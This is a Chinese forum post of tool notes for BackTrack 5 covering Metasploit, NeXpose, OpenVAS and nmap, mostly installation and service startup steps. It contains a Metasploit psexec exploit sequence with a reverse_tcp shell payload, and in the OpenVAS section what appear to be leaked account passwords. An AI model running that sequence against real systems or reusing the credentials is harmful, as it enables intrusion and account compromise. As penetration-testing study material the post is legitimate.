BT5中的常见工具操作技巧总结
4561 点击·0 回帖
灯火互联
楼主
 |  | |
 | 通过nmap,nessus,openvas,nexpose,获取CVE,BID,其它描述信息,到exploit-db.com,1337.com搜索是否有攻击代码。
0. 防火墙:ufw,gufw MetaSploitFramework: exploits:使用PAYLOAD的模块,不使用PAYLOAD的模块则为Auxiliary payload:在远程目标主机运行的代码 encoders:辅助PAYLOADS到达目标主机 Nops:充实PAYLOAD的尺寸 ############################ nessus 生成的报告格式选择.nessus(v1) 使用expliot示例: 1)use exploit/windows/smb/psexec set RHOST remoteip set PAYLOAD windows/shell/reverse_tcp #设置payload,即在远程目标主机运行的代码,一般选择提供远程网络服务或者反向连接的 set LHOST listenip#当PAYLOAD是反向连接时要设置 set LPORT 4444 set etc… exploit ######################################################################## 1. NeXpose 由rapid7收购msf后的扫描器,与msf对应,exploitable的漏洞有msf之类的攻击链接。 NeXpose默认的postgresql用户为nxpgsql, port:3780,扫描数量限制在8台 生成的报告格式选择nexpose simple xml. nxadmin:A 启动: Go to the directory that contains the script that starts NeXpose: $ cd [installation_directory]/nsc 3. Type the command to run the script: $ ./nsc.sh 可看到运行的后台提示 或者 /etc/init.d/nexposed restart 启动 web访问: http://ip:3780 其中nexposed的来历: $ cd [installation_directory]/nsc Open the nexposeconsole.rc file in your preferred text editing program. Look for two consecutive lines that read: #defines NXP_ROOT=/opt/rapid7/nexpose The directory in the second line is the default installation directory. NeXpose Software Installation and Quick-start Guide 16 If you did not use the default directory for installation, change the directory path to the one you chose: #defines NXP_ROOT=[installation_directory] Save and close the nexposeconsole.rc file. Copy the nexposeconsole.rc file to the /etc/init.d directory, and give it the desired daemon name: $ cp [installation_directory]/nexposeconsole.rc /etc/init.d/[daemon_name] Ensure that the daemon can run: $ chmod +x /etc/init.d/[daemon-name] Make the daemon start when the operating systems starts: $ update-rc.d [daemon_name] defaults Manually starting, stopping, or restarting NeXpose as a daemon in Ubuntu To manually start, stop, or restart NeXpose as a daemon: $ /etc/init.d/[daemon_name] <start|stop|restart> 卸载NeXpose: 1. Make sure to stop NeXpose. Otherwise, errors will occur when you reinstall the program. If you are not running NeXpose as a daemon, simply type the quit command, and press Enter in the shell in which you are running NeXpose. If you are running NeXose as a daemon, see Manually starting, stopping, or restarting NeXpose as a daemon in Ubuntu (on page 16). 2. Run the command to remove the program: $ rm -fr [installation_directory] #################################################### 2. openvas: root:shift(AB) loal id pwd is A wangql:wangql#@! 开启: 命令行输入: openvassd openvasmd openvasad gsad –http-only -a 127.0.0.1 -p 9392 openvasmd:manager,9390 openvasmd [OPTION...] – Manager of the Open Vulnerability Assessment System gsad:greenbone security assistant daemon,9392 gsad –http-only -a 127.0.0.1 -p 9392 #这样才能启动gsad并可从WEB访问w caution: there is a violation between NeXpose and OpenVAS, especially the above gsad command ,so uninstall the nexpose before use the gsad. openvasad:administrator添加用户,9393 9390,9391,9392,9393 FIX: Start OpenVAS Scanner (openvassd). FIX: Start OpenVAS Manager (openvasmd). FIX: Start OpenVAS Administrator (openvasad). FIX: Start Greenbone Security Assistant (gsad). #################################################### 3.nessus 4.nmap nmap -A -T4 192.168.10.3-254 -p 135 5.load xmlrpc 用armitage打开 msf console 不支持中文编码显示 info exploit/windows/wins/ms04_045_ins | |
 |  |